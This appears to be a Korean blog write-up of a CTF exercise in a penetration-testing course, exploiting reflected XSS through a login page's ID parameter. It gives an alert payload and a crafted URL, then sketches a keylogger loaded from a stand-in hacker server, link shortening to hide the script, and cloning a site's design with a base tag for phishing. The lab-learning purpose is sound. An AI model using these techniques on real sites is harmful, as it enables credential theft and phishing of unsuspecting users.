안녕하세요! 저번에 이어서 이번엔 7번을 풀어보겠습니다.
게시물이랑 마이페이지에서는 XSS 공격이 통하는 곳을 못 찾았습니다.
그래서 곰곰이 생각을 해보니 제가 입력한 ID가 그대로 들어가는 것을 확인했습니다.
한 번 ID에 alert문을 넣어보겠습니다.
그럼 ID을 <script>alert(1);</script> 을 하면 되겠죠?
해보겠습니다.
1234<script>alert(1);</script>
으로 ID 생성하겠습니다.
그리고 로그인을 하면?
이렇게 나옵니다.
그리고 버프 스위트 통해 링클을 생성하겠습니다.
그리고 send 했는데 잘 전달되는 게 보입니다.
이 링크를 생성하면?
http://ctf.segfaulthub.com:4343/xss_7/login.php?id=1234%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&pw=1234
그럼 xss 공격이 통하는 것을 알 수 있습니다.
그리고 저 링크을 보시면 너무 길고 가운데에 script가 뻔히 보여서 사람들은 이 링크을 누르는 게 꺼려질 겁니다.
그래서 보통 링크 축소 시켜주는 사이트를 이용합니다.
URL 링크단축 서비스-링크주소 줄이기, 단축URL, URL단축
긴 인터넷 링크주소 url을 짧게 줄여 주는 URL 링크단축 서비스로 큐알코드 생성, 통계서비스 제공 합니다.
url.kr
이런데 들어가서 링크를 넣어서 줄이면 됩니다!
다른 링크 줄이는 사이트 많습니다.
이제 제가 나쁜 놈이라고 생각을 하고 공격을 해보겠습니다.
그럼 저는 일단 저 만의 서버를 만들 겁니다.
그리고 난 뒤에 js파일을 그 서버에 넣은 뒤 그 사이트와 비슷하게 웹 사이트를 만들면 되겠죠.
그럼 대충 ID는
123<script src="[해커서버]/keylogger.js"></script>
이렇게 하면 자동으로 해커 서버의 keylogger이 실행되겠죠.
그런데 이뿐만 아니라 제가 피싱 사이트를 만들고 해커 서버에 적용하면
다른 사람들이 아무것도 모르고 적으면 공식 사이트가 아닌 피싱 사이트에 데이터를 적게 됩니다.
이거는 다음 포스팅에 실습을 해볼게요
참고로 F12로 html문을 가져온 다름 base 태그를 이용해서 베껴오면 피싱사이트의 디자인은 쉽게 해결이 됩니다.
예를 들어 <base href="http://naver.com"> 이렇게 하면 쉽게 네이버 페이지의 디자인을 가져올 수 있습니다.
그다음에 이제 스크립트문에 js파일이 아닌 php로 하거나 이름 조금 바꿔서 의심 안 드는 링크 만들면 되겠죠!
어쨌든.. 이렇게 7번 문제을 풀어 봤습니다.
다음 포스팅에는 제가 피싱 사이트와 키로거를 넣어서 한 번 해보겠습니다. 감사합니다.
'보안지식 > XSS' 카테고리의 다른 글
| XSS 실습 - 피싱 사이트 (0) | 2023.06.07 |
|---|---|
| XSS 공격 기법 정리 (총 정리) (0) | 2023.05.19 |
| [노말틱 모의 해킹 취업반 6주차 해킹과제] XSS 정리 - reflected XSS 실습(2번,3번 풀이) (1) | 2023.05.13 |
| [노말틱 모의 해킹 취업반 6주차 해킹과제] XSS 정리 (0) | 2023.05.05 |
